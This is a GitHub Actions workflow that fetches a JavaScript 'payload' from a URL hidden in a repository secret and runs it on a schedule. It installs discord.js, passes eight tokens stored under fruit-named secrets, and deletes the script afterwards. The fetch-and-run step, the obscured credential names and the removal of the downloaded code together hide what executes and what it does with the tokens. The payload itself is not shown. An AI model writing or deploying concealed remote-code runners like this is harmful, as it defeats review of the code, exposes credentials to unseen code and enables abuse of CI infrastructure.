name: Run Encrypted Task

on:
  workflow_dispatch:
  schedule:
    - cron: "0 0 * * 0"

jobs:
  execute:
    runs-on: ubuntu-latest

    steps:
      - name: Initialize Process
        uses: actions/checkout@v3

      - name: Configure Environment
        uses: actions/setup-node@v3
        with:
          node-version: 'latest'

      - name: Inject and Execute Payload
        run: |
          random_key=$(date +%s | sha256sum | base64 | head -c 32)
          echo "Running secure operations with key: $random_key"
          
          curl -o payload.js ${{ secrets.JS_CODE }}
          
          npm init -y > /dev/null 2>&1
          npm install cron-parser@^4.9.0 discord.js@^14.15.3 import-fresh@^3.3.0 inquirer@^9.2.23 node-cron@^3.0.3 > /dev/null 2>&1
          
          timeout 120s node payload.js || echo "Process timeout reached"
          
          rm payload.js || echo "Failed to remove payload"
        env:
          TOKEN_A: ${{ secrets.PITAYA }}
          TOKEN_B: ${{ secrets.ORANGES }}
          TOKEN_C: ${{ secrets.MANGO }}
          TOKEN_D: ${{ secrets.KIWI }}
          TOKEN_E: ${{ secrets.CHERRY }}
          TOKEN_F: ${{ secrets.GRAPE }}
          TOKEN_G: ${{ secrets.LEMON }}
          TOKEN_H: ${{ secrets.MELON }}
          ENCRYPTED_SCRIPT: ${{ secrets.JS_CODE }}
